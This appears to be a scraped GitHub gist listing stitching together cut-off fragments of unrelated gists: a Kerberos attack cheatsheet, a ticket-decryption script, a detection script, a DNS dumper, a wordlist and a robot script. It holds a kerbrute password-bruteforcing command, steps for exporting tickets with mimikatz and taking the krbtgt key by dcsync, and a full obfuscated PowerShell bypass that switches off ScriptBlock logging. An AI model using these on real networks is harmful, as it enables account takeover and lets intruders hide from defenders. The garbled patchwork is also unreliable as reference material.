
Adam M Toscher W00t3k

@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@xan7r
xan7r / decryptKerbTicket.py
Last active April 10, 2024 04:29
Decrypt kerberos tickets and parse out authorization data
#!/usr/bin/env python2
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
# Run this script to decrypt:
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./Administrator@TESTLAB.LOCAL_krbtgt~TESTLAB.LOCAL@TESTLAB.LOCAL.ccaches
# Carbon Black Evil PowerShell LSASS Query
#
# Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe
#
# Author: Jason Lang (@curi0usJack)
#
# Prereqs (Windows 10)
# Install bash on Win10
# sudo apt-get install python-pip
# sudo pip install --upgrade requests
@W00t3k
W00t3k / ScriptBlockLogBypass.ps1
Created June 10, 2018 23:55 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@blark
blark / Get-DNSARecords.ps1
Last active January 17, 2023 12:40
A simple Powershell script to get DNS records from a Microsoft DNS server
function Get-DNSARecords {
<#
.SYNOPSIS
Dumps A Records from a Microsoft Windows DNS server.
.DESCRIPTION
This script dumps the content of MicrosoftDNS_AType to a CSV file.
.PARAMETER Server
The name of the Computer you want to run the command against.
.PARAMETER CSVPath
@jhaddix
jhaddix / all.txt
Last active July 15, 2024 23:21
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
.
..
........
@
*
*.*
*.*.*
🐎
@tomsteele
tomsteele / santa.js
Created December 8, 2014 05:36
santa.js
var Cylon = require('cylon');
var EventEmitter = require('events').EventEmitter;
var Hapi = require('hapi');
var bot = new EventEmitter();
var on = false;
Cylon.robot({
connections: {
arduino: {